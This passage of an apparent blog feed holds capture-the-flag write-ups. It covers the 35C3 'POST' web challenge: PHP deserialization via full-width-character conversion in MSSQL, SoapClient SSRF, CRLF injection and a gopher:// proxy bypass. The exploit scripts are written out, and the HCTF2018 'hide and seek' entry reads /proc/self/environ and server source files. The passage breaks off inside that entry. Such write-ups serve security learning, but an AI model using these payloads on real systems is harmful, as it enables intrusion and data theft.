class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span 
class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">include</span> <span class="string">'inc/post.php'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">"title"</span>])) {</span><br><span class="line"> $attachments = <span class="keyword">array</span>();</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">isset</span>($_FILES[<span class="string">"attach"</span>]) && is_array($_FILES[<span class="string">"attach"</span>])) {</span><br><span class="line"> $folder = sha1(random_bytes(<span class="number">10</span>));</span><br><span class="line"> mkdir(<span class="string">"../uploads/$folder"</span>);</span><br><span class="line"> <span class="keyword">for</span> ($i = <span class="number">0</span>; $i < count($_FILES[<span class="string">"attach"</span>][<span class="string">"tmp_name"</span>]); $i++) {</span><br><span class="line"> <span class="keyword">if</span> ($_FILES[<span class="string">"attach"</span>][<span class="string">"error"</span>][$i] !== <span class="number">0</span>) <span class="keyword">continue</span>;</span><br><span class="line"> $name = basename($_FILES[<span class="string">"attach"</span>][<span class="string">"name"</span>][$i]);</span><br><span class="line"> move_uploaded_file($_FILES[<span class="string">"attach"</span>][<span class="string">"tmp_name"</span>][$i], <span class="string">"../uploads/$folder/$name"</span>);</span><br><span class="line"> $attachments[] = <span class="keyword">new</span> Attachment(<span class="string">"/uploads/$folder/$name"</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> $post = <span class="keyword">new</span> 
Post($_POST[<span class="string">"title"</span>], $_POST[<span class="string">"content"</span>], $attachments);</span><br><span class="line"> $post->save();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">"action"</span>])) {</span><br><span class="line"> <span class="keyword">if</span> ($_GET[<span class="string">"action"</span>] == <span class="string">"restart"</span>) {</span><br><span class="line"> Post::truncate();</span><br><span class="line"> header(<span class="string">"Location: /"</span>);</span><br><span class="line"> <span class="keyword">die</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><h2>Create <span class="keyword">new</span> post</h2></span><br><span class="line"><form method=<span class="string">"POST"</span> enctype=<span class="string">"multipart/form-data"</span>></span><br><span class="line"><table></span><br><span class="line"><tr></span><br><span class="line"><td></span><br><span class="line"><label <span class="keyword">for</span>=<span class="string">"title"</span>>Title</label></span><br><span class="line"></td> <td></span><br><span class="line"><input name=<span class="string">"title"</span>></span><br><span class="line"></td></span><br><span class="line"></tr></span><br><span class="line"><tr></span><br><span class="line"><td></span><br><span class="line"><label <span class="keyword">for</span>=<span class="string">"content"</span>>Content</label></span><br><span class="line"></td> <td></span><br><span class="line"><input name=<span class="string">"content"</span>></span><br><span class="line"></td></span><br><span class="line"></tr></span><br><span class="line"><tr></span><br><span class="line"><td></span><br><span class="line"><label <span class="keyword">for</span>=<span 
class="string">"attach"</span>>Attachments</label></span><br><span class="line"></td> <td></span><br><span class="line"><input name=<span class="string">"attach[]"</span> type=<span class="string">"file"</span>></span><br><span class="line"></td></span><br><span class="line"></tr></span><br><span class="line"><tr></span><br><span class="line"><td></span><br><span class="line"></td> <td></span><br><span class="line"><input name=<span class="string">"attach[]"</span> type=<span class="string">"file"</span>></span><br><span class="line"></td></span><br><span class="line"></tr></span><br><span class="line"><tr></span><br><span class="line"><td></span><br><span class="line"></td> <td></span><br><span class="line"><input name=<span class="string">"attach[]"</span> type=<span class="string">"file"</span>></span><br><span class="line"></td></span><br><span class="line"></tr></span><br><span class="line"><tr><td></td><td></span><br><span class="line"><input type=<span class="string">"submit"</span>></span><br><span class="line"></td></tr></span><br><span class="line"></table></span><br><span class="line"></form></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> $posts = Post::loadall();</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">empty</span>($posts)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<b>You do not have any posts. Create <a href=\"/?action=create\">some</a>!</b>"</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<b>You have "</span> . count($posts) .<span class="string">" posts. Create <a href=\"/?action=create\">some</a> more if you want! 
Or <a href=\"/?action=restart\">restart your blog</a>.</b>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">foreach</span>($posts <span class="keyword">as</span> $p) {</span><br><span class="line"> <span class="keyword">echo</span> $p;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br><br>"</span>;</span><br><span class="line"> }</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>post.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span 
class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Attachment</span> </span>{</span><br><span class="line"> <span class="keyword">private</span> $url = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $za = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $mime = <span 
class="keyword">NULL</span>;</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($url)</span> </span>{</span><br><span class="line"> <span class="keyword">$this</span>->url = $url;</span><br><span class="line"> <span class="keyword">$this</span>->mime = (<span class="keyword">new</span> finfo)->file(<span class="string">"../"</span>.$url);</span><br><span class="line"> <span class="keyword">if</span> (substr(<span class="keyword">$this</span>->mime, <span class="number">0</span>, <span class="number">11</span>) == <span class="string">"Zip archive"</span>) {</span><br><span class="line"> <span class="keyword">$this</span>->mime = <span class="string">"Zip archive"</span>;</span><br><span class="line"> <span class="keyword">$this</span>->za = <span class="keyword">new</span> ZipArchive;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span> </span>{</span><br><span class="line"> $str = <span class="string">"<a href='{$this->url}'>"</span>.basename(<span class="keyword">$this</span>->url).<span class="string">"</a> ($this->mime "</span>;</span><br><span class="line"> <span class="keyword">if</span> (!is_null(<span class="keyword">$this</span>->za)) {</span><br><span class="line"> <span class="keyword">$this</span>->za->open(<span class="string">"../"</span>.<span class="keyword">$this</span>->url);</span><br><span class="line"> $str .= <span class="string">"with "</span>.<span class="keyword">$this</span>->za->numFiles . <span class="string">" Files."</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $str. 
<span class="string">")"</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Post</span> </span>{</span><br><span class="line"> <span class="keyword">private</span> $title = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $content = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $attachment = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $ref = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $id = <span class="keyword">NULL</span>;</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($title, $content, $attachments=<span class="string">""</span>)</span> </span>{</span><br><span class="line"> <span class="keyword">$this</span>->title = $title;</span><br><span class="line"> <span class="keyword">$this</span>->content = $content;</span><br><span class="line"> <span class="keyword">$this</span>->attachment = $attachments;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">save</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">global</span> $USER;</span><br><span class="line"> <span class="keyword">if</span> (is_null(<span class="keyword">$this</span>->id)) {</span><br><span class="line"> DB::insert(<span class="string">"INSERT INTO posts (userid, title, content, attachment) 
VALUES (?,?,?,?)"</span>, </span><br><span class="line"> <span class="keyword">array</span>($USER->uid, <span class="keyword">$this</span>->title, <span class="keyword">$this</span>->content, <span class="keyword">$this</span>->attachment));</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> DB::query(<span class="string">"UPDATE posts SET title = ?, content = ?, attachment = ? WHERE userid = ? AND id = ?"</span>,</span><br><span class="line"> <span class="keyword">array</span>(<span class="keyword">$this</span>->title, <span class="keyword">$this</span>->content, <span class="keyword">$this</span>->attachment, $USER->uid, <span class="keyword">$this</span>->id));</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">truncate</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">global</span> $USER;</span><br><span class="line"> DB::query(<span class="string">"DELETE FROM posts WHERE userid = ?"</span>, <span class="keyword">array</span>($USER->uid));</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">load</span><span class="params">($id)</span> </span>{</span><br><span class="line"> <span class="keyword">global</span> $USER;</span><br><span class="line"> $res = DB::query(<span class="string">"SELECT * FROM posts WHERE userid = ? 
AND id = ?"</span>,</span><br><span class="line"> <span class="keyword">array</span>($USER->uid, $id));</span><br><span class="line"> <span class="keyword">if</span> (!$res) <span class="keyword">die</span>(<span class="string">"db error"</span>);</span><br><span class="line"> $res = $res[<span class="number">0</span>];</span><br><span class="line"> $post = <span class="keyword">new</span> Post($res[<span class="string">"title"</span>], $res[<span class="string">"content"</span>], $res[<span class="string">"attachment"</span>]);</span><br><span class="line"> $post->id = $id;</span><br><span class="line"> <span class="keyword">return</span> $post;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">loadall</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">global</span> $USER;</span><br><span class="line"> $result = <span class="keyword">array</span>();</span><br><span class="line"> $posts = DB::query(<span class="string">"SELECT id FROM posts WHERE userid = ? 
ORDER BY id DESC"</span>, <span class="keyword">array</span>($USER->uid)) ;</span><br><span class="line"> <span class="keyword">if</span> (!$posts) <span class="keyword">return</span> $result;</span><br><span class="line"> <span class="keyword">foreach</span> ($posts <span class="keyword">as</span> $p) {</span><br><span class="line"> $result[] = Post::load($p[<span class="string">"id"</span>]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $result;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span> </span>{</span><br><span class="line"> $str = <span class="string">"<h2>{$this->title}</h2>"</span>;</span><br><span class="line"> $str .= <span class="keyword">$this</span>->content;</span><br><span class="line"> $str .= <span class="string">"<hr>Attachments:<br><il>"</span>;</span><br><span class="line"> <span class="keyword">foreach</span> (<span class="keyword">$this</span>->attachment <span class="keyword">as</span> $attach) {</span><br><span class="line"> $str .= <span class="string">"<li>$attach</li>"</span>;</span><br><span class="line"> }</span><br><span class="line"> $str .= <span class="string">"</il>"</span>;</span><br><span class="line"> <span class="keyword">return</span> $str;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Looking at the <code>DB</code> class, its <code>query</code> method takes the <code>sql</code> statement, executes it, and hands the result to the <code>retrieve_values</code> method. That method contains an unserialize call, and it requires the string being unserialized to start with <code>$serializedobject$</code>.</p><p>In MSSQL, <strong>MSSQL automatically converts full-width Unicode characters to their ASCII representation</strong>: once stored, $s℮rializedobject$ becomes $serializedobject$. Note that the ℮ in the former is not the ASCII e. The hex of the whole string is as follows: the ℮ in the former is hex E284AE, while the e in the latter is ASCII 0x65.</p><p>From post.php, <code>SoapClient</code> can be used to reach MSSQL via SSRF, provided its <code>__call</code> method can be triggered. The <code>__toString</code> method of class <code>Attachment</code> contains a <code>$this->za->open</code> operation; if we serialize a <code>SoapClient</code> into <code>$za</code> and then trigger its <code>__toString</code> method, we get the SSRF.</p><p>Meanwhile <code>default.php</code> instantiates the <code>Post</code> class, passing in <code>$_POST["title"], $_POST["content"], $attachments</code>, and calls the <code>save</code> method.</p><p>It then calls <code>loadall()</code>, which runs the database query. At that point any returned string beginning with <code>$serializedobject$</code> is unserialized, and printing the returned value triggers the <code>Post</code> class's <code>__toString</code> method. Because the returned value contains the unserialized object, that object's <code>__toString</code> method is triggered in turn, which gives the SSRF.</p><p>exp:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Attachment</span> </span>{</span><br><span class="line"> <span class="keyword">private</span> $za = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">$this</span>->za = <span class="keyword">new</span> SoapClient(<span class="keyword">null</span>,<span class="keyword">array</span>(<span class="string">'location'</span>=><span class="string">'your_ip'</span>,<span class="string">'uri'</span>=><span class="string">'your_ip'</span>)); </span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">$c=<span class="keyword">new</span> Attachment();</span><br><span class="line">$aaa=serialize($c);</span><br><span class="line"><span class="keyword">echo</span> $aaa;</span><br></pre></td></tr></table></figure><p>From the Nginx configuration file, the miniProxy proxy listens on local port <code>8080</code> and only accepts GET requests, whereas <code>SoapClient</code> sends POST requests.</p><p>The <code>_user_agent</code> property of <code>SoapClient</code> is known to allow CRLF injection, so we can inject an additional GET request via <code>\r\n</code>.<br>Also, <code>miniProxy</code> only proxies <code>http / https</code> requests; this can be bypassed with <code>gopher:///</code>, because miniProxy only validates <code>http / https</code> when setting the <code>host</code>. Alternatively, a redirect to a <code>gopher request</code> also bypasses it.</p><p>gopher appends a <code>\r\n</code> after the request, so when building the gopher request a comment marker <code>-- -</code> must be added after the SQL statement. By inserting a <code>DEBUG</code> header we can obtain our <code>UID</code>.</p><p>exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"> </span><br><span class="line">host=<span class="string">"http://50.3.232.201:8000/?"</span></span><br><span class="line">post={</span><br><span class="line"> <span class="string">"username"</span>:<span class="string">"123456"</span>,</span><br><span class="line"> <span class="string">"password"</span>:<span class="string">"123456"</span>,</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line">r=requests.Session()</span><br><span class="line">url1=host+<span class="string">"page=login"</span></span><br><span class="line">r.post(url=url1,data=post)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">fetch_uid</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="keyword">return</span> r.get(host, headers={<span class="string">"Debug"</span>: <span class="string">"1"</span>}).content.decode().split(<span class="string">"int("</span>)[<span class="number">1</span>].split(<span class="string">")"</span>)[<span class="number">0</span>]</span><br><span class="line">payload=base64.b64decode(<span class="string">"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"</span>)</span><br><span class="line">print(payload)</span><br><span class="line">data={</span><br><span class="line"> <span class="string">"title"</span>:<span class="string">"123456"</span>,</span><br><span class="line"> <span class="string">"content"</span>:payload,</span><br><span class="line">}</span><br><span class="line">url2=host+<span class="string">"action=create"</span></span><br><span class="line">r.post(url=url2,data=data)</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<h1 id="35C3-POST"><a href="#35C3-POST" class="headerlink" title="35C3-POST"></a>35C3-POST</h1><p>Directory scanning turned up an uploads directory; a directory traversal test succeeded and yielded the nginx backup file and the source code.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">server &#123;</span><br><span class="line"> listen 80;</span><br><span class="line"> access_log /var/log/nginx/example.log;</span><br><span class="line"></span><br><span class="line"> server_name localhost;</span><br><span class="line"></span><br><span class="line"> root /var/www/html;</span><br><span class="line"></span><br><span class="line"> location /uploads &#123;</span><br><span class="line"> autoindex 
on;</span><br><span class="line"> alias /var/www/uploads/;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> location / &#123;</span><br><span class="line"> alias /var/www/html/;</span><br><span class="line"> index index.php;</span><br><span class="line"></span><br><span class="line"> location ~ \.php$ &#123;</span><br><span class="line"> include snippets/fastcgi-php.conf;</span><br><span class="line"> fastcgi_pass unix:/run/php/php7.2-fpm.sock;</span><br><span class="line"> &#125;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> location /inc/ &#123;</span><br><span class="line"> deny all;</span><br><span class="line"> &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">server &#123;</span><br><span class="line"> listen 127.0.0.1:8080;</span><br><span class="line"> access_log /var/log/nginx/proxy.log;</span><br><span class="line"></span><br><span class="line"> if ( $request_method !~ ^(GET)$ ) &#123;</span><br><span class="line"> return 405;</span><br><span class="line"> &#125;</span><br><span class="line"> root /var/www/miniProxy;</span><br><span class="line"> location / &#123;</span><br><span class="line"> index index.php;</span><br><span class="line"></span><br><span class="line"> location ~ \.php$ &#123;</span><br><span class="line"> include snippets/fastcgi-php.conf;</span><br><span class="line"> fastcgi_pass unix:/run/php/php7.2-fpm.sock;</span><br><span class="line"> &#125;</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</summary>
</entry>
<entry>
<title>HCTF2018-hideandseek</title>
<link href="http://fdrag0n.github.io/2018/12/19/HCTF2018-hideandseek/"/>
<id>http://fdrag0n.github.io/2018/12/19/HCTF2018-hideandseek/</id>
<published>2018-12-19T02:47:49.000Z</published>
<updated>2019-12-05T13:19:58.702Z</updated>
<content type="html"><![CDATA[<h1 id="hide-and-seek"><a href="#hide-and-seek" class="headerlink" title="hide and seek"></a>hide and seek</h1><p>After registering and logging in there is an upload point. Only zip files are accepted, and the contents of the files compressed inside the zip are extracted and printed on the page; uploading a PHP shell failed.</p><p>Try reading the Linux environment variables from /proc/self/environ:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UWSGI_ORIGINAL_PROC_NAME=/usr/local/bin/uwsgiSUPERVISOR_GROUP_NAME=uwsgiHOSTNAME=c52b2c48ec0bSHLVL=0PYTHON_PIP_VERSION=18.1HOME=/rootGPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421DUWSGI_INI=/app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.iniNGINX_MAX_UPLOAD=0UWSGI_PROCESSES=16STATIC_URL=/staticUWSGI_CHEAPER=2NGINX_VERSION=1.15.8-1~stretchPATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binNJS_VERSION=1.15.8.0.2.7-1~stretchLANG=C.UTF-8SUPERVISOR_ENABLED=1PYTHON_VERSION=3.6.8NGINX_WORKER_PROCESSES=autoSUPERVISOR_SERVER_URL=unix:///var/run/supervisor.sockSUPERVISOR_PROCESS_NAME=uwsgiLISTEN_PORT=80STATIC_INDEX=0PWD=/app/hard_t0_guess_n9f5a95b5ku9fgSTATIC_PATH=/app/staticPYTHONPATH=/appUWSGI_RELOADS=0</span><br></pre></td></tr></table></figure><p>This reveals the file /app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.ini</p><p>Reading that file</p><p>gives:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[uwsgi] module = hard_t0_guess_n9f5a95b5ku9fg.hard_t0_guess_also_df45v48ytj9_main callable=app</span><br></pre></td></tr></table></figure><p>Next, read /app/hard_t0_guess_n9f5a95b5ku9fg/hard_t0_guess_also_df45v48ytj9_main.py</p><p>which gives</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span 
class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask,session,render_template,redirect, url_for, escape, request,Response</span><br><span class="line"><span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> flag</span><br><span class="line"><span class="keyword">from</span> werkzeug.utils <span class="keyword">import</span> secure_filename</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line">random.seed(uuid.getnode())</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">'SECRET_KEY'</span>] = str(random.random()*<span class="number">100</span>)</span><br><span class="line">app.config[<span class="string">'UPLOAD_FOLDER'</span>] = <span class="string">'./uploads'</span></span><br><span class="line">app.config[<span class="string">'MAX_CONTENT_LENGTH'</span>] = <span class="number">100</span> * <span class="number">1024</span></span><br><span class="line">ALLOWED_EXTENSIONS = set([<span class="string">'zip'</span>])</span><br><span class="line"></span><br><span class="line"><span 
class="function"><span class="keyword">def</span> <span class="title">allowed_file</span><span class="params">(filename)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> <span class="string">'.'</span> <span class="keyword">in</span> filename <span class="keyword">and</span> \</span><br><span class="line"> filename.rsplit(<span class="string">'.'</span>, <span class="number">1</span>)[<span class="number">1</span>].lower() <span class="keyword">in</span> ALLOWED_EXTENSIONS</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/', methods=['GET'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line"> error = request.args.get(<span class="string">'error'</span>, <span class="string">''</span>)</span><br><span class="line"> <span class="keyword">if</span>(error == <span class="string">'1'</span>):</span><br><span class="line"> session.pop(<span class="string">'username'</span>, <span class="keyword">None</span>)</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, forbidden=<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'username'</span> <span class="keyword">in</span> session:</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, user=session[<span class="string">'username'</span>], flag=flag.flag)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span 
